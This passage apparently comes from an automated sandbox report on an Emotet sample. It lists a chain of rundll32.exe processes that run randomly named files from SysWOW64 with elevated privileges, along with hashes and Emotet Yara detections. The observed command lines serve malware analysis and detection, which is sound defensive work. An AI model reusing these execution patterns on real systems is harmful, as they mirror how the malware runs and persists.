                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103779024.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2732 Parent PID: 2688

                                              General

                                              Start time:18:44:48
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105264847.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105243347.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2824 Parent PID: 2732

                                              General

                                              Start time:18:44:49
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2108184568.00000000002E1000.00000020.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2107810345.0000000000240000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2456 Parent PID: 2824

                                              General

                                              Start time:18:44:49
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2109299524.00000000001F0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2109419000.0000000000211000.00000020.00000001.sdmp, Author: Joe Security
                                              Reputation:moderate

                                              Analysis Process: rundll32.exe PID: 2496 Parent PID: 2456

                                              General

                                              Start time:18:44:50
                                              Start date:07/01/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL
                                              Imagebase:0x1e0000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2339862225.00000000001F1000.00000020.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2339841860.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security

                                              Disassembly

                                              Code Analysis

                                              Reset < >